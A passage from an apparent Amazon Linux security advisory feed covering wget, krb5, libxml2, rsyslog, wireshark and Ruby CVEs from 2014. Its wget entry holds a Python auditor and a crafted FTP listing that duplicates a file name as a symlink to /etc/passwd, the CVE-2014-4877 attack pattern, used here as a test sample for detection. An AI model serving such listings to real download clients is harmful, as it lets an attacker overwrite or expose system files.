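lrwxrwxrwx 1 ftp ftp   11 Oct 27 2014 notes.txt -> /etc/passwd
-rw-r--r-- 1 ftp ftp 2048 Oct 27 2014 notes.txt
"""


def parse_list(listing):
    """Return (name, kind, target) tuples; kind is 'file', 'dir' or 'symlink'."""
    entries = []
    for line in listing.splitlines():
        match = _LIST_RE.match(line.strip())
        if not match:
            continue  # unparseable line: a real client should log it, not guess
        mode, rest = match.group(1), match.group(2)
        if mode[0] == "l":
            name, _, target = rest.partition(" -> ")
            entries.append((name, "symlink", target))
        elif mode[0] == "d":
            entries.append((rest, "dir", None))
        else:
            entries.append((rest, "file", None))
    return entries


def audit_listing(listing, root="/srv/mirror"):
    """Return a list of findings; an empty list means nothing in the listing
    would be turned into a symlink that another entry later writes through,
    or into a symlink pointing outside root."""
    findings = []
    by_name = defaultdict(list)
    for name, kind, target in parse_list(listing):
        by_name[name].append((kind, target))

    for name, kinds in by_name.items():
        has_symlink = any(kind == "symlink" for kind, _ in kinds)
        # The CVE-2014-4877 pattern: one name, two entries, one of them a symlink.
        if len(kinds) > 1 and has_symlink:
            findings.append(
                f"{name}: listed {len(kinds)} times, one entry is a symlink "
                "(file download would write through the link)"
            )
        for kind, target in kinds:
            if kind != "symlink":
                continue
            # Resolve the target relative to the local download root and
            # reject anything absolute or escaping the root via '..'.
            resolved = posixpath.normpath(posixpath.join(root, target))
            if posixpath.isabs(target) or not resolved.startswith(root + "/"):
                findings.append(f"{name}: symlink target {target!r} escapes {root}")
    return findings


if __name__ == "__main__":
    for finding in audit_listing(SAMPLE_LISTING):
        print(finding)
```

Running the block against the constructed listing reports both problems with notes.txt: the duplicate name with a symlink entry, and the absolute target outside the download root. The point of the second check is that a symlink alone is not the bug; the combination of a client-created symlink and a later write through it is, which is why wget 1.16 stopped materialising server-supplied symlinks by default.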
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4877" title="" id="CVE-2014-4877" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget-debuginfo" version="1.16" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.16-1.13.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.16" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.16-1.13.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.16" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.16-1.13.amzn1.i686.rpm</filename></package><package name="wget" version="1.16" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.16-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-443</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-443: medium priority package update for krb5</title><issued date="2014-11-11 10:25:00" /><updated date="2014-11-11 10:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4345:
A buffer overflow was found in the KADM5 administration server (kadmind) when it was used with an LDAP back end for the KDC database. A remote, authenticated attacker could potentially use this flaw to execute arbitrary code on the system running kadmind.
CVE-2014-4344:
A NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO acceptor for continuation tokens. A remote, unauthenticated attacker could use this flaw to crash a GSSAPI-enabled server application.
CVE-2014-4343:
A double-free flaw was found in the MIT Kerberos SPNEGO initiators. An attacker able to spoof packets to appear as though they are from a GSSAPI acceptor could use this flaw to crash a client application that uses MIT Kerberos.
CVE-2014-4342:
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker who is able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application.
CVE-2014-4341:
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker who is able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application.
CVE-2013-6800:
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. A remote, unauthenticated attacker could use this flaw to crash the KDC using a specially crafted request.
CVE-2013-1418:
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. A remote, unauthenticated attacker could use this flaw to crash the KDC using a specially crafted request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1418" title="" id="CVE-2013-1418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6800" title="" id="CVE-2013-6800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4341" title="" id="CVE-2014-4341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4342" title="" id="CVE-2014-4342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4343" title="" id="CVE-2014-4343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4344" title="" id="CVE-2014-4344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4345" title="" id="CVE-2014-4345" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1389.html" title="" id="RHSA-2014:1389" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-libs" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" 
release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-33.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-444</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-444: medium priority package update for libxml2</title><issued date="2014-11-11 10:26:00" /><updated date="2014-11-11 10:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3660:
A denial of service flaw was found in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML file that, when processed by an application using libxml2, would lead to excessive CPU consumption (denial of service) based on excessive entity substitutions, even if entity substitution was disabled, which is the parser default behavior.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3660" title="" id="CVE-2014-3660" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1655.html" title="" id="RHSA-2014:1655" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="3.1.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxml2-static-2.9.1-3.1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-445</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-445: medium priority package update for rsyslog</title><issued date="2014-11-11 10:26:00" /><updated date="2014-11-11 10:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3634:
A flaw was found in the way rsyslog handled invalid log message priority values. In certain configurations, a local attacker, or a remote attacker able to connect to the rsyslog port, could use this flaw to crash the rsyslog daemon.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3634" title="" id="CVE-2014-3634" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1671.html" title="" id="RHSA-2014:1671" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsyslog" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-snmp-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gssapi-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-pgsql-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-mysql-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-debuginfo-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gnutls-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-mysql-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-debuginfo-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="9.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/rsyslog-pgsql-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gnutls-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gssapi-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-snmp-5.8.10-9.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-446</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-446: medium priority package update for wireshark</title><issued date="2014-11-11 10:27:00" /><updated date="2014-11-11 10:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6432:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6431:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6430:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6429:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6428:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6427:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6426:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6425:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6424:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6423:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6422:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6421:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6421" title="" id="CVE-2014-6421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6422" title="" id="CVE-2014-6422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6423" title="" id="CVE-2014-6423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6424" title="" id="CVE-2014-6424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6425" title="" id="CVE-2014-6425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6426" title="" id="CVE-2014-6426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6427" title="" id="CVE-2014-6427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6428" title="" id="CVE-2014-6428" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6429" title="" id="CVE-2014-6429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6430" title="" id="CVE-2014-6430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6431" title="" id="CVE-2014-6431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6432" title="" id="CVE-2014-6432" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1676.html" title="" id="RHSA-2014:1676" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-debuginfo" version="1.8.10" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-8.14.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="8.14.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/wireshark-1.8.10-8.14.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-8.14.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-8.14.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.8.10" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-8.14.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-8.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-447</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-447: medium priority package update for ruby19</title><issued date="2014-11-13 17:25:00" /><updated date="2014-11-16 13:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8090:
1159927:
CVE-2014-8090 ruby: REXML incomplete fix for CVE-2014-8080
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8090" title="" id="CVE-2014-8090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems19" version="1.8.23.2" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.64.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.64.amzn1.noarch.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.64.amzn1.noarch.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.64.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.64.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.64.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-32.64.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.64.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.64.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.64.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.64.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby19-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-32.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-448</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-448: medium priority package update for ruby20</title><issued date="2014-11-13 17:26:00" /><updated date="2014-11-16 13:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8090:
1159927:
CVE-2014-8090 ruby: REXML incomplete fix for CVE-2014-8080
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8090" title="" id="CVE-2014-8090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem20-bigdecimal" version="1.2.0" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.20.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.598-1.20.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.598-1.20.amzn1.noarch.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.20.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.598-1.20.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.20.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.598-1.20.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.20.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.598-1.20.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.20.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.598-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-449</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-449: medium priority package update for ruby21</title><issued date="2014-11-13 17:26:00" /><updated date="2014-11-16 13:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8090:
1159927:
CVE-2014-8090 ruby: REXML incomplete fix for CVE-2014-8080
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8090" title="" id="CVE-2014-8090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-irb" version="2.1.5" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.5-1.15.amzn1.noarch.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.2-1.15.amzn1.noarch.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.2-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.5" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.5-1.15.amzn1.noarch.rpm</filename></package><package name="rubygems21" version="2.2.2" release="1.15.amzn1" epoch="0" 